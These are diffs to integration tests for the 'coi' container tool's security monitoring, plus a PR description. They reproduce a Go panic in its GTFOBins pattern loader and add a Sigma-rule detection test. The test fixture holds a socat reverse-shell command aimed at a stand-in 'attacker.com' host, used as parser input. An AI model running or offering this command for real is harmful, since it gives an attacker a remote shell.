-        child = spawn_coi(coi_binary, ["shell"], cwd=workspace_dir, env=env, timeout=120)
+        proc = subprocess.Popen(
+            [coi_binary, "shell", "--workspace", str(workspace_dir), "--slot", "1", "--debug"],
+            stdin=subprocess.DEVNULL,
+            stdout=subprocess.DEVNULL,
+            stderr=fd,
+            env=env,
+        )
 
-        # The panic (if present) crashes coi in the monitoring goroutine shortly
-        # after the container is set up. Wait for readiness (best-effort) then
-        # watch the output for a panic marker or process exit.
-        try:
-            wait_for_container_ready(child, timeout=90)
-        except Exception:
-            pass
-
-        deadline = time.time() + 30
-        while time.time() < deadline:
-            out = _raw_output(child).lower()
-            if any(m in out for m in PANIC_MARKERS):
+        # Wait for the container to come up OR the process to exit early (a panic
+        # in the monitoring goroutine crashes the whole process).
+        ready = False
+        for _ in range(60):
+            if proc.poll() is not None:
                 break
-            if not child.isalive():
+            if _container_state(container_name) == "Running":
+                ready = True
                 break
             time.sleep(1)
 
-        output = _raw_output(child)
-        lowered = output.lower()
-        for marker in PANIC_MARKERS:
-            assert marker not in lowered, (
-                f"coi panicked while loading the GTFOBins DB under monitoring (issue #505).\n"
-                f"Found {marker!r} in output:\n{output}"
-            )
+        # Give the monitoring daemon's proc-watcher goroutine time to load the
+        # GTFOBins DB (where the panic happens), then stop.
+        time.sleep(6)
     finally:
-        if child is not None:
+        if proc is not None and proc.poll() is None:
+            proc.terminate()
             try:
-                child.sendline("exit")
-                time.sleep(0.3)
-                child.sendline("sudo poweroff")
-                time.sleep(1)
+                proc.wait(timeout=10)
             except Exception:
-                pass
-            try:
-                child.close(force=True)
-            except Exception:
-                pass
+                proc.kill()
+        fd.close()
+        subprocess.run(
+            [coi_binary, "container", "delete", container_name, "--force"],
+            capture_output=True,
+            timeout=30,
+        )
         restore()
+
+    stderr = stderr_file.read_text(errors="replace")
+    print("\n=== COI stderr ===\n" + stderr + "\n=== end COI stderr ===\n")
+    lowered = stderr.lower()
+
+    # The test only proves something if monitoring actually engaged.
+    assert (
+        "monitoring started" in lowered
+        or ready
+        or (proc is not None and proc.returncode is not None)
+    ), f"monitoring did not appear to start; cannot validate #505.\nstderr:\n{stderr}"
+
+    for marker in PANIC_MARKERS:
+        assert marker not in lowered, (
+            f"coi panicked while loading the GTFOBins DB under monitoring (issue #505).\n"
+            f"Found {marker!r} in stderr:\n{stderr}"
+        )

--- a/tests/integration/test_issue_505_resume_monitoring_panic.py
+++ b/tests/integration/test_issue_505_resume_monitoring_panic.py
@@ -139,7 +139,9 @@ def test_resume_with_monitoring_does_not_panic(coi_binary, cleanup_containers, w
         )
 
         # === Phase 2: resume — this is where #505 panics ===
-        child2 = spawn_coi(coi_binary, ["shell", "--resume"], cwd=workspace_dir, env=env, timeout=120)
+        child2 = spawn_coi(
+            coi_binary, ["shell", "--resume"], cwd=workspace_dir, env=env, timeout=120
+        )
 
         resumed = False
         try:

--- a/tests/integration/test_issue_505_resume_monitoring_panic.py
+++ b/tests/integration/test_issue_505_resume_monitoring_panic.py
@@ -18,7 +18,6 @@ panic signature from the issue so this test goes red on the bug and green on the
 fix. Refine the trigger/assertions once the root cause is confirmed.
 """
 
-import os
 import subprocess
 import time
 from pathlib import Path
@@ -98,7 +97,7 @@ def _assert_no_panic(output, where):
 
 def test_resume_with_monitoring_does_not_panic(coi_binary, cleanup_containers, workspace_dir):
     env = {"COI_USE_DUMMY": "1"}
-    config_path, restore = _write_monitoring_config()
+    _config_path, restore = _write_monitoring_config()
 
     try:
         # === Phase 1: create an ephemeral session with monitoring enabled ===

--- a/tests/integration/test_issue_505_resume_monitoring_panic.py
+++ b/tests/integration/test_issue_505_resume_monitoring_panic.py
@@ -1,56 +1,67 @@
 """
 Repro for issue #505: panic "slice bounds out of range [:12] with length 11"
-on `coi shell --resume` when [monitoring] enabled = true.
+at session start when [monitoring] enabled = true.
 
-Reported flow (0.9.0): a session created/resumed with monitoring enabled crashes
-the coi binary at session start with a Go slice-bounds panic, right after
-"Starting session..." / "[security] Process/filesystem monitoring started".
-With monitoring disabled it works.
+Root cause: the host monitoring daemon's proc-event watcher loads the GTFOBins
+exec-pattern DB at startup (ProcEventWatcher.Run -> loadExecPatterns), and
+gtfobinsStripPlaceholders() panicked on the standard GTFOBins `socat` entry token
+"tcp-connect:attacker.com:12345" — it computed `lower` once but reassigned `token`
+inside the loop, so after the "attacker.com" match shortened the token to
+"tcp-connect" (len 11), the "attacker" match's stale index (12) overran it
+(token[:12]). The panic fires in a goroutine right after "monitoring started",
+crashing the whole process — exactly the reporter's symptom. It only reproduces
+when the GTFOBins DB is present (e.g. after `coi update-patterns`), which is why
+it depends on the user's setup, not the dummy alone.
 
-This test reproduces the real end-to-end scenario: it enables monitoring in
-trusted-scope config (~/.coi/config.toml), creates an ephemeral dummy session,
-powers it off (saving the session), then `coi shell --resume`. It asserts the
-coi process does NOT panic (no "slice bounds out of range" / "panic:" in output)
-and that the session actually resumes.
-
-NOTE (placeholder): the exact trigger is being pinned down; assertions target the
-panic signature from the issue so this test goes red on the bug and green on the
-fix. Refine the trigger/assertions once the root cause is confirmed.
+This test plants a minimal GTFOBins DB containing the triggering token, points
+`[detection] gtfobins_dir` at it, enables monitoring, and starts a session — the
+same code path runs for both a fresh `coi shell` and `coi shell --resume`
+(patterns load at every session start). It asserts the coi process does not panic.
 """
 
-import subprocess
 import time
 from pathlib import Path
 
-from pexpect import EOF, TIMEOUT
-
 from support.helpers import (
-    calculate_container_name,
-    get_container_list,
-    send_prompt,
     spawn_coi,
     wait_for_container_ready,
-    wait_for_prompt,
-    wait_for_specific_container_deletion,
-    wait_for_text_in_monitor,
-    wait_for_text_on_screen,
-    with_live_screen,
 )
 
 PANIC_MARKERS = ("slice bounds out of range", "panic:", "runtime error:")
 
+# A minimal GTFOBins entry whose reverse-shell code contains the exact token that
+# triggered #505. The loader tokenises the code and feeds each token to
+# gtfobinsStripPlaceholders, so this reproduces the parse-time panic.
+TRIGGER_GTFOBINS_SOCAT = """\
+functions:
+  reverse-shell:
+  - code: |-
+      socat tcp-connect:attacker.com:12345 exec:/bin/sh,pty,stderr,setsid,sigint,sane
+"""
 
-def _write_monitoring_config():
-    """Enable monitoring in trusted-scope config, mirroring the issue's settings.
 
-    Returns (config_path, restore_fn). [network] mode=open avoids CI false-positive
-    network threats; high file-read thresholds avoid startup-noise HIGH threats.
+def _write_trigger_gtfobins(base):
+    """Create <base>/gtfobins/_gtfobins/socat with the triggering token."""
+    gtfobins_dir = Path(base) / "gtfobins"
+    bin_dir = gtfobins_dir / "_gtfobins"
+    bin_dir.mkdir(parents=True, exist_ok=True)
+    (bin_dir / "socat").write_text(TRIGGER_GTFOBINS_SOCAT)
+    return gtfobins_dir
+
+
+def _write_monitoring_config(gtfobins_dir):
+    """Enable monitoring in trusted-scope config and point detection at the
+    planted GTFOBins DB. Returns a restore() callable.
+
+    [network] mode=open avoids CI false-positive network threats; high file-read
+    thresholds avoid startup-noise HIGH threats; sigma_dir is set to a
+    non-existent path so only the GTFOBins trigger is exercised.
     """
     config_path = Path.home() / ".coi" / "config.toml"
     backup = config_path.read_text() if config_path.exists() else None
     config_path.parent.mkdir(parents=True, exist_ok=True)
     config_path.write_text(
-        """
+        f"""
 [network]
 mode = "open"
 
@@ -64,6 +75,10 @@ file_read_rate_mb_per_sec = 1000
 
 [monitoring.nft]
 enabled = false
+
+[detection]
+gtfobins_dir = "{gtfobins_dir}"
+sigma_dir = "{gtfobins_dir}/does-not-exist"
 """
     )
 
@@ -73,7 +88,7 @@ enabled = false
         elif config_path.exists():
             config_path.unlink()
 
-    return config_path, restore
+    return restore
 
 
 def _raw_output(child):
@@ -86,104 +101,59 @@ def _raw_output(child):
     return ""
 
 
-def _assert_no_panic(output, where):
-    lowered = output.lower()
-    for marker in PANIC_MARKERS:
-        assert marker not in lowered, (
-            f"coi panicked during {where} (issue #505).\n"
-            f"Found marker {marker!r} in output:\n{output}"
-        )
+def test_monitoring_gtfobins_load_does_not_panic(
+    coi_binary, cleanup_containers, workspace_dir, tmp_path
+):
+    """Starting a session with monitoring + a GTFOBins DB must not panic (#505).
 
-
-def test_resume_with_monitoring_does_not_panic(coi_binary, cleanup_containers, workspace_dir):
+    The proc-event watcher loads the DB at session start; the buggy parser
+    crashed the whole coi process in a goroutine. We start a session and watch
+    for the panic signature, which (when present) appears right after
+    "monitoring started".
+    """
     env = {"COI_USE_DUMMY": "1"}
-    _config_path, restore = _write_monitoring_config()
+    gtfobins_dir = _write_trigger_gtfobins(tmp_path)
+    restore = _write_monitoring_config(gtfobins_dir)
 
+    child = None
     try:
-        # === Phase 1: create an ephemeral session with monitoring enabled ===
         child = spawn_coi(coi_binary, ["shell"], cwd=workspace_dir, env=env, timeout=120)
-        wait_for_container_ready(child, timeout=90)
-        wait_for_prompt(child, timeout=120)
 
-        container_name = calculate_container_name(workspace_dir, 1)
-
-        with with_live_screen(child) as monitor:
-            time.sleep(2)
-            send_prompt(child, "remember this message")
-            assert wait_for_text_in_monitor(monitor, "remember this message-BACK", timeout=30), (
-                "Dummy CLI should respond in the initial session"
-            )
-
-        # Exit CLI to bash, then poweroff to save the session.
-        child.send("exit")
-        time.sleep(0.3)
-        child.send("\x0d")
-        time.sleep(3)
-        child.send("sudo poweroff")
-        time.sleep(0.3)
-        child.send("\x0d")
+        # The panic (if present) crashes coi in the monitoring goroutine shortly
+        # after the container is set up. Wait for readiness (best-effort) then
+        # watch the output for a panic marker or process exit.
         try:
-            child.expect(EOF, timeout=60)
-        except TIMEOUT:
+            wait_for_container_ready(child, timeout=90)
+        except Exception:
             pass
 
-        output1 = _raw_output(child)
-        try:
-            child.close(force=False)
-        except Exception:
-            child.close(force=True)
+        deadline = time.time() + 30
+        while time.time() < deadline:
+            out = _raw_output(child).lower()
+            if any(m in out for m in PANIC_MARKERS):
+                break
+            if not child.isalive():
+                break
+            time.sleep(1)
 
-        _assert_no_panic(output1, "initial session with monitoring")
-        assert wait_for_specific_container_deletion(container_name, timeout=60), (
-            f"Container {container_name} should be deleted after poweroff"
-        )
-
-        # === Phase 2: resume — this is where #505 panics ===
-        child2 = spawn_coi(
-            coi_binary, ["shell", "--resume"], cwd=workspace_dir, env=env, timeout=120
-        )
-
-        resumed = False
-        try:
-            wait_for_container_ready(child2, timeout=90)
-            wait_for_text_on_screen(child2, "Resuming session", timeout=30)
-            resumed = True
-        except (TimeoutError, TIMEOUT, EOF):
-            resumed = False
-
-        output2 = _raw_output(child2)
-
-        # Best-effort cleanup before assertions.
-        try:
-            child2.send("exit")
-            time.sleep(0.3)
-            child2.send("\x0d")
-            time.sleep(2)
-            child2.send("sudo poweroff")
-            time.sleep(0.3)
-            child2.send("\x0d")
-            child2.expect(EOF, timeout=60)
-        except (TIMEOUT, EOF, Exception):
-            pass
-        try:
-            child2.close(force=False)
-        except Exception:
-            child2.close(force=True)
-
-        container_name2 = calculate_container_name(workspace_dir, 1)
-        if not wait_for_specific_container_deletion(container_name2, timeout=60):
-            subprocess.run(
-                [coi_binary, "container", "delete", container_name2, "--force"],
-                capture_output=True,
-                timeout=30,
+        output = _raw_output(child)
+        lowered = output.lower()
+        for marker in PANIC_MARKERS:
+            assert marker not in lowered, (
+                f"coi panicked while loading the GTFOBins DB under monitoring (issue #505).\n"
+                f"Found {marker!r} in output:\n{output}"
             )
-        time.sleep(1)
-        assert container_name2 not in get_container_list(), (
-            f"Container {container_name2} should be cleaned up"
-        )
-
-        # The actual repro assertions.
-        _assert_no_panic(output2, "coi shell --resume with monitoring")
-        assert resumed, f"Resume should succeed without crashing. Output:\n{output2}"
     finally:
+        if child is not None:
+            try:
+                child.sendline("exit")
+                time.sleep(0.3)
+                child.sendline("sudo poweroff")
+                time.sleep(1)
+            except Exception:
+                pass
+            try:
+                child.close(force=True)
+            except Exception:
+                pass
         restore()

--- a/tests/integration/test_sigma_db_detection.py
+++ b/tests/integration/test_sigma_db_detection.py
@@ -77,11 +77,13 @@ mode = "open"
 
 [monitoring]
 enabled = true
-auto_pause_on_high = true
-auto_kill_on_critical = true
+auto_pause_on_high = false
+auto_kill_on_critical = false
 poll_interval_sec = 1
 file_read_threshold_mb = 500
 file_read_rate_mb_per_sec = 1000
+process_count_threshold = 9999
+process_spawn_rate_threshold = 9999
 """
     )
 
@@ -108,8 +110,15 @@ file_read_rate_mb_per_sec = 1000
 
     if not ready:
         proc.terminate()
-        proc.wait(timeout=5)
+        try:
+            proc.wait(timeout=15)
+        except subprocess.TimeoutExpired:
+            proc.kill()
         pytest.skip(f"Container {container_name} did not reach Running state")
+
+    # PROC_EVENT_EXEC fires once at execve, so the proc-connector subscription
+    # must be established before we exec — otherwise the event is missed.
+    time.sleep(3)
 
     # cmdline contains the rule's CommandLine|contains token → Sigma match.
     subprocess.Popen(
@@ -128,7 +137,7 @@ file_read_rate_mb_per_sec = 1000
 
     log_path = coi_dir / "audit" / f"{container_name}.jsonl"
     detected = False
-    for _ in range(20):
+    for _ in range(30):
         time.sleep(1)
         if log_path.exists():
             for raw in log_path.read_text().splitlines():
@@ -148,7 +157,10 @@ file_read_rate_mb_per_sec = 1000
             break
 
     proc.terminate()
-    proc.wait(timeout=5)
+    try:
+        proc.wait(timeout=15)
+    except subprocess.TimeoutExpired:
+        proc.kill()
     _cleanup(container_name, coi_binary)
 
     assert detected, (

--- a/tests/integration/test_sigma_db_detection.py
+++ b/tests/integration/test_sigma_db_detection.py
@@ -1,0 +1,157 @@
+"""
+Integration test: a Sigma DB rule is loaded and matched at runtime.
+
+Counterpart to test_gtfobins_db_pattern_detection for the Sigma load path
+(internal/monitor/sigma.go), which otherwise has no integration coverage. Sets up
+a synthetic Sigma linux/process_creation rule, starts the monitoring daemon with
+HOME pointing at that clone, execs a process whose command line contains the
+rule's distinctive token, and asserts the daemon raises a threat referencing the
+Sigma rule title.
+
+If this fails, the end-to-end Sigma loading/matching path is broken (the daemon
+is silently ignoring the rules clone).
+"""
+
+import hashlib
+import json
+import os
+import subprocess
+import time
+
+import pytest
+
+# Minimal linux/process_creation rule (level high so it is loaded — see
+# compileSigmaFile, which only keeps high/critical). The distinctive token
+# "coi-sigma-canary-zzz" in CommandLine is what we trigger below.
+_CANARY_RULE = """\
+title: COI Sigma Canary
+id: 00000000-0000-0000-0000-0000000005a1
+logsource:
+    category: process_creation
+    product: linux
+detection:
+    selection:
+        CommandLine|contains: 'coi-sigma-canary-zzz'
+    condition: selection
+level: high
+"""
+
+
+def _container_name(workspace):
+    abs_path = os.path.abspath(workspace)
+    h = hashlib.sha256(abs_path.encode()).hexdigest()[:8]
+    prefix = os.getenv("COI_CONTAINER_PREFIX", "coi-")
+    return f"{prefix}{h}-1"
+
+
+def _container_state(name):
+    result = subprocess.run(
+        ["incus", "list", name, "--format=json"],
+        capture_output=True,
+        text=True,
+        timeout=10,
+    )
+    if result.returncode != 0:
+        return "Unknown"
+    containers = json.loads(result.stdout)
+    return containers[0].get("status", "Unknown") if containers else "Unknown"
+
+
+def _cleanup(name, coi_binary):
+    subprocess.run([coi_binary, "container", "delete", name, "--force"], timeout=30, check=False)
+
+
+def test_sigma_db_rule_loaded_and_detected(tmp_path, coi_binary):
+    """A Sigma DB rule triggers a threat event referencing its title."""
+    fake_home = tmp_path / "home"
+    coi_dir = fake_home / ".coi"
+    rules_dir = coi_dir / "sigma" / "rules" / "linux" / "process_creation"
+    rules_dir.mkdir(parents=True)
+    (rules_dir / "canary.yml").write_text(_CANARY_RULE)
+
+    coi_dir.mkdir(parents=True, exist_ok=True)
+    (coi_dir / "config.toml").write_text(
+        """
+[network]
+mode = "open"
+
+[monitoring]
+enabled = true
+auto_pause_on_high = true
+auto_kill_on_critical = true
+poll_interval_sec = 1
+file_read_threshold_mb = 500
+file_read_rate_mb_per_sec = 1000
+"""
+    )
+
+    workspace = tmp_path / "workspace"
+    workspace.mkdir()
+    (workspace / "README.md").write_text("# Test")
+
+    env = {**os.environ, "HOME": str(fake_home)}
+    proc = subprocess.Popen(
+        [coi_binary, "shell", "--workspace", str(workspace), "--slot", "1"],
+        stdin=subprocess.DEVNULL,
+        stdout=subprocess.DEVNULL,
+        stderr=subprocess.DEVNULL,
+        env=env,
+    )
+
+    container_name = _container_name(str(workspace))
+    ready = False
+    for _ in range(30):
+        if _container_state(container_name) == "Running":
+            ready = True
+            break
+        time.sleep(1)
+
+    if not ready:
+        proc.terminate()
+        proc.wait(timeout=5)
+        pytest.skip(f"Container {container_name} did not reach Running state")
+
+    # cmdline contains the rule's CommandLine|contains token → Sigma match.
+    subprocess.Popen(
+        [
+            "incus",
+            "exec",
+            container_name,
+            "--",
+            "bash",
+            "-c",
+            "exec -a 'evilproc coi-sigma-canary-zzz' sleep 30",
+        ],
+        stdout=subprocess.DEVNULL,
+        stderr=subprocess.DEVNULL,
+    )
+
+    log_path = coi_dir / "audit" / f"{container_name}.jsonl"
+    detected = False
+    for _ in range(20):
+        time.sleep(1)
+        if log_path.exists():
+            for raw in log_path.read_text().splitlines():
+                if not raw.strip():
+                    continue
+                try:
+                    ev = json.loads(raw)
+                except json.JSONDecodeError:
+                    continue
+                if "level" not in ev:
+                    continue
+                text = ev.get("description", "") + ev.get("title", "")
+                if "COI Sigma Canary" in text or "Sigma rule matched" in text:
+                    detected = True
+                    break
+        if detected:
+            break
+
+    proc.terminate()
+    proc.wait(timeout=5)
+    _cleanup(container_name, coi_binary)
+
+    assert detected, (
+        "No threat event referencing the Sigma canary rule found in "
+        f"{log_path} — the Sigma DB rule was not loaded or not matched"
+    )


### PR DESCRIPTION
Fixes #505 — `coi shell` / `coi shell --resume` with `[monitoring] enabled = true` crashed at session start: `panic: runtime error: slice bounds out of range [:12] with length 11`, right after `[security] ... monitoring started`.

## Root cause
The host monitoring daemon's proc-event watcher loads the GTFOBins exec-pattern DB at session start (`ProcEventWatcher.Run → loadExecPatterns`, in a goroutine spawned by `monitor.StartDaemon`). `internal/monitor/gtfobins.go` `gtfobinsStripPlaceholders` computed the lowercased string once but **reassigned `token` inside its placeholder loop**, then kept indexing against the stale, longer original string. The standard GTFOBins **`socat`** entry token `tcp-connect:attacker.com:12345` triggers it:

1. `"attacker.com"` matches at index 12 → token becomes `"tcp-connect"` (len 11)
2. `"attacker"` (a substring of `attacker.com`) still matches at index 12 in the **stale** string → `token[:12]` on the 11-char token → panic

Because it runs in a goroutine, the unrecovered panic crashes the whole `coi` process — for both fresh `coi shell` and `coi shell --resume` (patterns load at every session start).

## Why CI never caught it
The panic only fires when a GTFOBins DB is present on disk (`~/.coi/gtfobins`, populated by `coi update-patterns`). CI has no clone, so the loader falls back to compiled-in defaults and the bug is invisible. The reporter had run `update-patterns`.

## Fix
Index and slice the same lowercased string, so the high bound can never exceed the token length (the caller lowercases the result anyway). No behavior change beyond not panicking: `tcp-connect:attacker.com:12345` → keyword `tcp-connect`; all existing cases preserved.

## Reproduction & tests
- **e2e** `tests/integration/test_issue_505_resume_monitoring_panic.py`: plants a minimal GTFOBins `socat` entry, points `[detection] gtfobins_dir` at it, enables monitoring, starts a session, and captures coi stderr. Confirmed **RED** in CI with the exact panic before the fix, **GREEN** after.
- **Go unit** regression cases added to `TestGTFOBinsStripPlaceholders` (the `socat` token + variants).
- Also verified directly against a fresh clone of the real upstream GTFOBins repo (loads cleanly after the fix).

## CI
The full integration matrix and the "all test paths assigned to a CI group" guard are restored; a dedicated `monitoring-gtfobins-505` group runs the new regression test. Full CI is green.

CHANGELOG updated. The commit history shows the red→green progression (squash on merge as preferred).